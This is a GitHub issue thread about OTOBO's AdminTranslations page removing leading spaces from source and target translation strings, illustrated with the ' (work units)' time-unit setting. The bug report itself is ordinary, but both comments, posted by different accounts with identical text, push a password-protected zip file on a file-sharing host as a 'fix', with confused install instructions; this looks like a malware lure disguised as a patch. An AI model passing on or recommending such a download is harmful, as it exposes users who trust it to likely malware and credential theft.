### ISSUE TITLE
AdminTranslations removes leading empty spaces after saving the translation

### ISSUE THREAD

**Issue by StefanAbel-OTOBO** [RotherOSS/otobo#3728]
When you add a new translation via Action=AdminTranslations and source or target language string contain a leading empty space ' ', it is automatically removed from both strings after saving the translation.
This is important, because you e.g. have the System Configuration setting "Ticket::Frontend::TimeUnits", where by default you have the string " (work units)" which you often change, e.g. to " (in minutes)". This string always contains the leading empty space.
When you e.g. translate now " (in minutes)" to " (in Minuten)" in German and save it, you have the source string "(in minutes)" and the target string "(in MInuten)".
This is after saving:
![image](https://github.com/user-attachments/assets/e23e46f2-d6e4-44d7-b53b-1c881b3c2b86)

I tested in ov270 with OTOBO 11.0.5

(Another workaround fix would be to not have the empty space in the setting necessary, but it should work nevertheless.)

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
